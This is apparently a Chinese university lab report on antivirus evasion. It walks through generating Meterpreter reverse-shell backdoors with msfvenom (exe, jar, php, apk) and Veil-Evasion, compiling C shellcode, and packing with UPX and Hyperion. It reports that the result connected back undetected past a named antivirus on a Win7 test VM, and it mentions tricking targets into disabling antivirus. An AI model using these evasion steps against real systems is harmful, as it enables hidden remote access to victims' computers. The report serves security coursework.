Exp3 免杀原理与实践
一、实践内容概述
1.正确使用msf编码器,msfvenom生成如jar之类的其他文件,veil-evasion,加壳工具,使用shellcode编程
2.通过组合应用各种技术实现恶意代码免杀
3.用另一电脑实测,在杀软开启的情况下,可运行并回连成功,注明电脑的杀软名称与版本
4.基础问题回答
(1)杀软是如何检测出恶意代码的?
-
基于特征码的检测
- 简单来说一段特征码就是一段或多段数据。如果一个可执行文件(或其他运行的库、脚本等)包含这样的数据则被认为是恶意代码。
- AV软件厂商要做的就是尽量搜集最全的、最新的特征码库。所以杀毒软件的更新很重要。过时的特征码库就是没有用的库。
-
启发式恶意软件检测
- 如果一个软件在干通常是恶意软件干的事,看起来像个恶意软件,那我们就把它当成一个恶意软件。
- 优点:可以检测0-day恶意软件;具有一定通用性。
- 缺点:实时监控系统行为,开销稍多;没有基于特征码的精确度高。
-
基于行为的恶意软件检测
- 基于行为的检测相当于是启发式的一种,或者是加入了行为监控的启发式。
(2)免杀是做什么?
一般是对恶意软件做处理,让它不被杀毒软件所检测,也是渗透测试中需要使用到的技术。
(3)免杀的基本方法有哪些?
-
改变特征码
- 如果你手里只有EXE:加壳--压缩壳、加密壳。
- 有shellcode(像Meterpreter):用encode进行编码;基于payload重新编译生成可执行文件。
- 有源代码:用其他语言进行重写再编译(veil-evasion)。
-
改变行为
- 通讯方式:尽量使用反弹式连接;使用隧道技术;加密通讯数据。
- 操作模式:基于内存操作;减少对系统的修改;加入混淆作用的正常功能代码。
-
非常规方法
- 使用一个有漏洞的应用当成后门,编写攻击代码集成到如MSF中。
- 使用社工类攻击,诱骗目标关闭AV软件。
- 纯手工打造一个恶意软件。
二、实践具体步骤
(一)任务一: 正确使用msf编码器,msfvenom生成如jar之类的其他文件,veil-evasion,使用shellcode编程,加壳工具
1.正确使用msf编码器
- 输入指令
# msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 10 -b ‘x00’ LHOST=192.168.19.128 LPORT=5306 -f exe > msf5306.exe
生成exe文件
- Windows自带杀毒软件发现了它
- 关闭防火墙和实时保护,使用VirusTotal进行扫描
- 使用Virscan进行扫描
- 开启电脑管家
- 编码多次仍被检测出来的原因:
- shikata_ga_nai总会有解码(decoder stub)部分需要加入的exe中,只要盯住这部分就可以了。
- 模板是msfvenom用来生成最终Exe的那个壳子exe文件,msfvenom会以固定的模板生成exe,所有它生成的exe,如果使用默认参数或模板,也有一定的固定特征。如果使用msfvenom免杀,就要使用原生的模板。
2.msfvenom生成如jar之类的其他文件
- 输入指令
msfvenom -p java/meterpreter/reverse_tcp LHOST=192.168.19.128 LPORT=5306 x > 5306_java_backdoor.jar
生成java后门程序
- 扫描结果如下
- 开启电脑管家
- 输入指令
msfvenom -p php/meterpreter/reverse_tcp LHOST=192.168.19.128 LPORT=5306 x> 5306_php_backdoor.php
生成php后门程序
- 扫描结果如下
- 开启电脑管家
- 输入指令
msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.19.128 LPORT=5306 x> 5306_android_backdoor.apk
生成Android后门程序
- 扫描结果如下
- 开启电脑管家
3.使用veil-evasion生成后门程序及检测
- 打开热点
git clone https://www.github.com/Veil-Framework/Veil-Evasion.git
从github上进行clone下载- 下载完成后,安装软件配置包,依次输入指令
ls
,cd Veil-Evasion
,ls
,cd setup
,./setup.sh
- 询问是否继续安装时,输入
Y
- 跳出python for windows安装界面,一路点击
Next
,Finish
,Accept
- 出现Setup-Ruby1.8.7-p371时,全选中复选框,点击
Install
- 输入
list
- 选择
6) c/meterpreter/rev_tcp
- 依次输入命令
set LHOST 192.168.19.128
(Kali的IP),set LPORT 5306
,options
- 输入指令
generate
生成文件,输入payload名字veil53061
- 依图中所示路径,找到了
veil53061.exe
,小小地开心一哈~
- 用virustotal检测一下,还是被发现了
- 开启电脑管家
- 注:下次进入veil,需先进入到有
Veil-Evasion
的文件夹,然后输入指令./Veil-Evasion.py
4.C语言调用Shellcode
- 输入指令
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.19.128 LPORT=5306 -f c
用C语言生成一段shellcode
touch 20165306buf.c
创建一个文件,将刚刚生成的unsigned char buf[]
复制到其中
- 输入指令
i686-w64-mingw32-g++ 20165306buf.c -o 20165306buf.exe
生成可执行文件
- 用virustotal检测如下
- 开启电脑管家
5.加壳
- 加壳的全称应该是可执行程序资源压缩,压缩后的程序可以直接运行。
- 加壳的另一种常用的方式是在二进制的程序中植入一段代码,在运行的时候优先取得程序的控制权,之后再把控制权交还给原始代码,这样做的目的是为了隐藏程序真正的OEP(入口点,防止被破解)。大多数病毒就是基于此原理。
- 加壳的程序需要阻止外部程序或软件对加壳程序本身的反汇编分析或者动态分析,以达到保护壳内原始程序以及软件不被外部程序破坏,保证原始程序正常运行。
- 这种技术也常用来保护软件版权,防止软件被破解。但对于病毒,加壳可以绕过一些杀毒软件的扫描,从而实现它作为病毒的一些入侵或破坏的一些特性。
- MSF的编码器使用类似方法,对shellcode进行再编码。
- 从技术上分壳分为:
- 压缩壳:减少应用体积,如ASPack,UPX
- 加密壳:版权保护,反跟踪。如ASProtect,Armadillo
- 虚拟机:通过类似编译手段,将应用指令转换为自己设计的指令集。如VMProtect, Themida
- 压缩壳(UPX)
给20165306buf.exe
加个壳得到5306_upxed.exe
用virustotal检测如下
- 开启电脑管家
- 加密壳(Hyperion)
将5306_upxed.exe
拷贝到/usr/share/windows-binaries/hyperion/
目录中
进入目录/usr/share/windows-binaries/hyperion/
中
输入指令wine hyperion.exe -v 5306_upxed.exe 5306_upxed_Hyperion.exe
加壳
被Windows自带杀软发现
用virustotal检测如下
- 开启电脑管家
(二)任务二:通过组合应用各种技术实现恶意代码免杀
- C语言调用shellcode+加密壳+压缩壳
- 使用msfconsole回连
- 电脑管家13.3.20237.212没有发现
(三)任务三:用另一电脑实测,在杀软开启的情况下,可运行并回连成功,注明电脑的杀软名称与版本
受害者:win7虚拟机
杀毒软件:电脑管家13.3.20237.212
- 对
20165306buf
加密壳,再压缩壳,生成5306buf_Hyperion_upxed.exe
- 将Win7虚拟机和Kali ping通,在Win7中设置共享文件夹,安装ncat
- 使用msfconsole回连
- Win7的电脑管家没有发现
- 对
20165306buf.exe
加压缩壳生成20165306buf_upxed.exe
,室友电脑帮忙扫描
三、实验中遇到的问题
问题1:无法获得锁
-
原因:其他进程占用了自己要使用的资源
-
解决:
ps aux | grep "apt-get"
列出所有占用apt资源的进程,sudo kill 进程id
结束其他进程,然后输入指令sudo rm /var/cache/apt/archives/lock
和sudo rm /var/lib/dpkg/lock
。
问题2:远端意外挂断了
- 原因:也许是校园网的问题
- 解决:打开热点,然后参考 免杀后门之MSF&Veil-Evasion的完美结合成功安装Veil-Evasion
问题3:无法打开加过压缩壳的文件
- 解决:重新把
5306_upxed.exe
拷贝到指定目录下,确保拷贝成功后,再执行下面的指令
问题4:win7和kali ping不通
- 解决:如下图改成桥接模式
成功ping通
四、实验体会
1.时刻加强防范意识
2.懂得借力≠完全依靠他人。
装veil时我参考了许多同学的博客,装了一下午还是失败,本来想拷同学的虚拟机,但出于和自己较劲的心态,终于找到了适合自己的教程并安装成功,有小小的成就感。继续加油呀~
3.认真阅读实验要求,多看多问多思考,不要想当然。感谢学长的耐心指导!
- 修改主机名!